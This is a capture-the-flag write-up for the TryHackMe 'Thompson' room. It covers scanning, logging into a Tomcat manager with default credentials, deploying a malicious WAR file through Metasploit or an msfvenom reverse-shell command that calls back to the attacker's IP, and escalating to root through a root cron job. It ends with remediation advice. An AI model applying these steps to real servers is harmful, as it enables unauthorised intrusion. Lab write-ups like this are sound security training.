Tryhackme Thompson

Daniel Schwarzentraub
5 min readAug 5, 2022

Lets go ahead and run an nmap scan

Lets go ahead and use the nmap vulners script against port 8080 to see what exploits might exist

Trying one of the exploits from searchsploit fails

Lets run a dirsearch against the url

If we browse to the site, off to the right there are login options

If we click one of the buttons, such as Server Status, we will be prompted for a login

If we press cancel, we will be brought to a generic tomcat unauthorized page

Lets go ahead and use tomcat as the username and s3cret as the password to see if it lets us in

Now that we have a username and password, we can launch metasploit and see if we can find a tomcat manager exploit for uploading malicious WAR files

We will use the tomcat mgr upload exploit

We need to set our options

Now lets set our correct payload

Now run shell

Now to find the user.txt file. We will navigate to the home directory first, and find a user called jack

If we change directory into jack, and then list the files, we will find a user text file

Lets go ahead and cat out the test.txt file

Lets cat out

Now lets see what cron jobs are running

Now that we know there is a cron job running as root, we can finish our privilege escalation

Obtaining a User Shell without Metasploit

After we log into tomcat, left side we will click on List Applications

Scroll down, and we will see a WAR file upload option

msfvenom -p java/shell_reverse_tcp lhost=tun0_ip lport=4321 -f war -o shell.war

Now we need to upload the file and also open up a netcat session on the port we specified

Now click Deploy

Now we need to click our file name that we uploaded, so it will execute

Its always good to upgrade the shell if python is installed on the machine. Running the command which python will let us know if its installed

Being able to cat files isn’t the best way to obtain root, so lets spin up a netcat session and run a different command so we can obtain a root shell and browse around the system as needed

Next we need to run the following command, and then wait about 3 to 5 minutes

After which we will run another command

After about another 3 to 5 minutes, we will have obtained a root shell

Lessons Learned/Remediations:

  1. Always keep your software up to date

2. Do not use easy passwords that can be found in wordlists, such as default system passwords

3. Do not expose the tomcat manager application, since this has administrative capabilities

